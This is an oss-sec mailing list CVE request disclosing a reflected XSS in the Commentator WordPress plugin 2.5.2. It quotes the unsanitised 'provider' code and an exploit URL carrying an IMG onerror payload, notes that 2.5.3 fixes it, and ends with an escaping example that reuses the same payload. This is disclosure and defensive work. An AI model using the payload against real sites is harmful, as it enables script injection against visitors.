oss-sec mailing list archives
CVE Request: Commentator WordPress Plugin 2.5.2 XSS Vulnerability
From: Rahul Pratap Singh <techno.rps () gmail com>
Date: Wed, 13 Jan 2016 19:42:12 +0530
Reflected XSS Vulnerability:

I would request you to assign CVE id to this issue.

----------------------------------------
Description:
----------------------------------------
"provider" parameter is not sanitized that leads to Reflected XSS.

----------------------------------------
Vulnerable Code:
----------------------------------------
file: commentator.php

line:441
$provider_name = $_REQUEST["provider"];

line:544
<div id="commentator-social-signin" class="commentator-<?php echo $provider_name; ?>">

----------------------------------------
Exploit:
----------------------------------------
/wp-admin/admin-ajax.php?action=commentator_social_signin&provider=facebook">%20<IMG%20SRC=axc%20onerror=alert(1)>

----------------------------------------
POC:
----------------------------------------
https://0x62626262.files.wordpress.com/2016/01/commentatorxsspoc.png

Fix:
Update to 2.5.3

Disclosure Timeline:
reported to vendor : 9/1/2016
vendor response : 11/1/2016
vendor acknowledged : 11/1/2016
vendor deployed a patch: 11/1/2016

Pub ref:
http://codecanyon.net/item/commentator-wordpress-plugin/6425752
https://0x62626262.wordpress.com/2016/01/13/commentator-wordpress-plugin-xss-vulnerability
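
One way to close the pattern shown in the report above, as an added example (not the plugin's code and not the vendor's 2.5.3 patch, which this page does not show): validate "provider" against an allow-list, then escape it for the HTML attribute context. The function names and the allow-list entries other than "facebook" are assumptions.

```php
<?php
// Added example: hypothetical helpers, not taken from commentator.php.
// Allow-list entries other than "facebook" are assumptions.
const ALLOWED_PROVIDERS = ['facebook', 'twitter', 'google'];

/**
 * Return the provider if it is a known value, otherwise null.
 * Non-string input (e.g. provider[]=x) is rejected as well.
 */
function commentator_validate_provider($raw): ?string
{
    if (!is_string($raw)) {
        return null;
    }
    $candidate = strtolower(trim($raw));
    return in_array($candidate, ALLOWED_PROVIDERS, true) ? $candidate : null;
}

/** Render the sign-in container with the value escaped for an attribute context. */
function commentator_render_signin(string $provider): string
{
    // ENT_QUOTES encodes both quote styles so the value cannot close the attribute.
    $class = htmlspecialchars('commentator-' . $provider, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div id="commentator-social-signin" class="' . $class . '">';
}

// Constructed sample inputs: a legitimate value, the decoded "provider" value
// from the request in the report, and an array-typed parameter.
$samples = [
    'facebook',
    'facebook"> <IMG SRC=axc onerror=alert(1)>',
    ['facebook'],
];

foreach ($samples as $raw) {
    $provider = commentator_validate_provider($raw);
    if ($provider === null) {
        // Inside WordPress this branch would end the request, e.g. with wp_die().
        echo 'rejected: ' . json_encode($raw) . PHP_EOL;
        continue;
    }
    echo commentator_render_signin($provider) . PHP_EOL;
}

// Escaping alone (no allow-list) still keeps the value inside the class attribute.
echo commentator_render_signin('facebook"> <IMG SRC=axc onerror=alert(1)>') . PHP_EOL;
```

Inside WordPress, esc_attr() is the usual call for the attribute-escaping step; htmlspecialchars() is used here so the script runs without WordPress loaded.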